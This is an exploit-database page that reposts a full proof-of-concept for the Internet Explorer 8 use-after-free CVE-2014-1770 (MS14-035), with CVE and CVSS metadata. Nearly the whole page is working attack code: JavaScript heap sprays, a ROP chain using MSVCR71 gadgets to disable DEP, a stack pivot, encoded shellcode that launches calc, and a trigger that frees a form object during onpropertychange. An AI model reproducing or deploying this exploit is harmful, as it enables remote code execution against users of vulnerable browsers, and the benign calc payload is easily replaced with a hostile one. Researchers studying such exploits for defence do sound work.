Advertisement






Internet Explorer 8 MS14-035 Use-After-Free Exploit

CVE Category Price Severity
CVE-2014-1770 CWE-416 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2014-11-11
CPE
cpe:cpe:/a:microsoft:internet_explorer:8.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014110068

Below is a copy:

<!--
Exploit Title: MS14-035 Use-after-free Exploit for IE8
Date: 10 Nov 2014
Exploit Author: Ayman Sagy <[email protected]> https://www.linkedin.com/in/aymansagy
Tested on: IE8 with Java6 on Windows7
-->
  
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
  
<!--
<APPLET id="dummy" code="dummy.class" width=100 height=100>
You need to install Java to view this page.
</APPLET>
-->
<div id="mydiv">x</div>
   
<form id="frm"></form>
  
<div id="sprayfrm"></div>
   
<script type="text/javascript">
  
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
   
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
         
          
pivot = unescape("%u8b05%u7c34"); // stack pivot
          
// MSVCR71
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
          
// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");
  
/*
       _______0x1cc_____
       |               |
      \|/              |
Junk   ROP Shellcode  Pivot  Junk
        2       3       1
*/ 
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
  
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;
  
  
  
data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
   
while (data.length < 0x80000) data += data;
  
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
    var obj = document.createElement("button");
    obj.title = data.substring(0,0x40000-0x58);
    //obj.style.fontFamily = data.substring(0,0x40000-0x58);
    sprayelement.appendChild(obj);
}
     
      
block = unescape( // Literal string to avoid heap allocation
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
            "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
  
  
blocks = new Array();
      
for (i = 0; i < spraysize; i++) {        // spray 1
    blocks.push(document.createElement("button"));
    blocks[i].setAttribute("title",block.substring(0, block.length));
    sprayelement.appendChild(blocks[i]);
}
      
for (i = spraysize/2; i < spraysize; i++) {      // free some blocks
    blocks[i].setAttribute("title","");
}
  
   
   
var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'></textarea>";
   
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
   
   
document.getElementById("CInput").checked = true;
  
trigger = true;
  
document.getElementById("frm").reset();
  
   
   
function crash() {
   
    if (trigger) {
    document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
    CollectGarbage();
  
    for (i = spraysize/2; i < spraysize; i++) {      // spray 2
        blocks[i].setAttribute("title",block.substring(0, block.length));
        }
    }
}
  
</script>
   
 </body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum